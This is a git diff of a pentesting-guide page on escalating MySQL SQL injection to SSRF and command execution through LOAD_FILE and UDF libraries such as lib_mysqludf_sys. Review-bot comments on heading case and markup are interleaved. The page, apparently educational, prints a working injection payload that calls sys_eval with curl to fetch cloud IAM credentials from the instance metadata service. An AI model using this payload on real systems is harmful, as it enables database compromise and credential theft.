GitBook: [#3584] No subject
parent 5d7c86366f
commit d8ffc8fffb
|
@ -521,7 +521,7 @@
|
|||
* [MS Access SQL Injection](pentesting-web/sql-injection/ms-access-sql-injection.md)
|
||||
* [MSSQL Injection](pentesting-web/sql-injection/mssql-injection.md)
|
||||
* [MySQL injection](pentesting-web/sql-injection/mysql-injection/README.md)
|
||||
* [Mysql File priv to SSRF/RCE](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
|
||||
* [MySQL File priv to SSRF/RCE](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
|
||||
* [Oracle injection](pentesting-web/sql-injection/oracle-injection.md)
|
||||
* [PostgreSQL injection](pentesting-web/sql-injection/postgresql-injection/README.md)
|
||||
* [dblink/lo\_import data exfiltration](pentesting-web/sql-injection/postgresql-injection/dblink-lo\_import-data-exfiltration.md)
|
||||
|
|
|
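Review bot: the corrected entry "MySQL File priv to SSRF/RCE" still sits in a list with mixed heading case: its parent reads "MySQL injection" and "Oracle injection" and "PostgreSQL injection" use a lowercase "injection", while "MSSQL Injection" and "MS Access SQL Injection" capitalise it. Since this change is a capitalisation cleanup of one entry, consider normalising the neighbouring titles in the same pass so the table of contents is consistent.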
@ -1,4 +1,4 @@
|
|||
# Mysql File priv to SSRF/RCE
|
||||
# MySQL File priv to SSRF/RCE
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -14,7 +14,7 @@
|
|||
|
||||
**Post copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona)
|
||||
|
||||
### Using LOAD\_FILE/LOAD DATA/LOAD XML
|
||||
### LOAD\_FILE/LOAD DATA/LOAD XML to SSRF
|
||||
|
||||
Every SQL Out of Band data exfiltration article will use the `LOAD_FILE()` string function to make a network request. The function itself has its own limitations based on the operating system it is run on and the settings with which the database was started.
|
||||
|
||||
|
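Review bot: renaming the heading to `### LOAD\_FILE/LOAD DATA/LOAD XML to SSRF` changes the anchor generated for this section, so any link that targets the old "Using LOAD\_FILE/LOAD DATA/LOAD XML" heading will stop resolving. Search the book for references to the old anchor before merging, or keep the old wording if other pages link here.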
@ -30,13 +30,13 @@ This Server Side Request Forgery, although useful, is restricted to only TCP por
|
|||
|
||||
![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/3.png)
|
||||
|
||||
### Using User Defined Functions
|
||||
### User Defined Functions to RCE
|
||||
|
||||
Another cool technique with MySQL databases is the ability to use User Defined Functions (UDF) present in external library files that if present in specific locations or system $PATH then can be accessed from within MySQL.
|
||||
|
||||
You could use a SQL Injection to write a library (`.so` or `.dll` depending on Linux or Windows), containing a User Defined Function that can make network/HTTP requests, that can be then invoked through additional queries.
|
||||
You could use a SQL Injection to **write a library (`.so` or `.dll`** depending on Linux or Windows), containing a User Defined Function that can make network/HTTP requests, that can be then invoked through additional queries.
|
||||
|
||||
This has its own set of restrictions though. Based on the version of MySQL, which you can identify with `select @@version`, the directory where plugins can be loaded from is restricted. MySQL below `v5.0.67` allowed for library files to be loaded from system path if the `plugin_dir` variable was not set. This has changed now and newer versions have the `plugin_dir` variable set to something like `/usr/lib/mysql/plugin/`, which is usually owned by root.
|
||||
This has its own set of restrictions though. Based on the version of MySQL, which you can identify with `select @@version`, the directory where plugins can be loaded from is restricted. MySQL below `v5.0.67` allowed for library files to be loaded from system path if the `plugin_dir` variable was not set. This has changed now and newer versions have the **`plugin_dir`** variable set to something like `/usr/lib/mysql/plugin/`, which is usually owned by root.
|
||||
|
||||
Basically **for you to load a custom library into MySQL and call a function from the loaded library via SQL Injection, you would need**:
|
||||
|
||||
|
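Review bot: the new heading `### User Defined Functions to RCE` promises command execution, but the paragraphs under it in this hunk still describe a library with a User Defined Function "that can make network/HTTP requests", which is the SSRF case. Either add a sentence stating that the loaded library is used to run operating system commands, or keep SSRF in the heading so title and body agree. Separately, in `**write a library (`.so` or `.dll`** depending on Linux or Windows)` the bold run closes inside the parenthesis, so the emphasis covers an opening bracket without its close; end the bold before the bracket (`**write a library**`) or after it.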
@ -44,7 +44,7 @@ Basically **for you to load a custom library into MySQL and call a function from
|
|||
* **`file_priv`** set to **`Y`** in `mysql.user` for the current database user
|
||||
* **`secure_file_priv`** set to **`""`** so that you can read the raw bytes of the library from an arbitrary location like the network or a file uploads directory in a web application.
|
||||
|
||||
Assuming the above conditions are met, you can use the classical approach of transferring the [popular MySQL UDF `lib_mysqludf_sys` library](https://github.com/mysqludf/lib\_mysqludf\_sys) to the database server. You would then be able to make operating system command requests like `cURL` or `powershell wget` to perform SSRF using the syntax
|
||||
Assuming the above conditions are met, you can use the **classical approach of transferring the** [**popular MySQL UDF `lib_mysqludf_sys` library**](https://github.com/mysqludf/lib\_mysqludf\_sys) **to the database server**. You would then be able to make operating system command requests like `cURL` or `powershell wget` to perform SSRF using the syntax
|
||||
|
||||
`x'; SELECT sys_eval('curl http://169.254.169.254/latest/meta-data/iam/security-credentials/'); -- //`
|
||||
|
||||
|
|
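Review bot: the emphasis added to the `lib_mysqludf_sys` sentence is split into three separate bold runs around the link (`**classical approach of transferring the** [**popular MySQL UDF ...**](...) **to the database server**`), which is awkward to maintain and can render unevenly; bolding only the link text would carry the same emphasis. The sentence also still ends at "using the syntax" with no colon, and the statement that follows is inline code on its own line; a colon and a fenced block would read better. Because the `file_priv` and `secure_file_priv` conditions listed just above are the settings an administrator controls, a closing line naming them as the configuration to review would round off the section.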